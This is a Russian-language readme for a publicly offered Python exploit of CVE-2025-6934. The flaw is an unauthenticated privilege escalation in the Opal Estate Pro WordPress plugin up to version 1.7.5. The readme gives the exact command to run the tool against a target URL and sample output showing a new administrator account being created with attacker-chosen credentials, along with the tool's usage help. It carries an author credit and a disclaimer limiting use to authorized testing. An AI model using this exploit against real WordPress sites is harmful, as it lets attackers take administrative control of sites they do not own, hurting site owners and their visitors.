
Opal Estate Pro <= 1.7.5 - неаутентифицированное повышение привилегий
Плагин Opal Estate Pro – Property Management and Submission для WordPress, используемый темой FullHouse - Real Estate Responsive WordPress Theme, уязвим к повышению привилегий во всех версиях до 1.7.5 включительно.
Этот эксплойт на Python автоматизирует процесс повышения привилегий:
readme.txt.python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail [email protected] -password nxp1234
[•] Проверка версии плагина:
[+] Обнаружена уязвимая версия: 1.7.5
[•] Попытка эксплойта начата
[+] Nonce найден: 70dd70630b
[+] HTTP статус: 200
[✔] Эксплойт успешен!
--------------------------
Имя пользователя : nxploitedadmin
Email : [email protected]
Пароль : nxp1234
Роль : administrator
--------------------------
Эксплойт от: Khaled_alenazi (Nxploited) | https://github.com/Nxploited
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD
Эксплойт CVE-2025-6934 от Khaled Alenazi (Nxploited)
options:
-h, --help показать это справочное сообщение и выйти
-u, --url URL Целевой URL (например, http://site.com/path/)
-mail, --newmail NEWMAIL
Email для регистрации администратора
-password, --newpassword NEWPASSWORD
Пароль для нового пользователя-администратора
Данный скрипт предназначен только для образовательного и авторизованного тестирования безопасности.
Неавторизованное использование этого инструмента против целей без согласия строго запрещено.
Автор: Khaled_alenazi (Nxploited)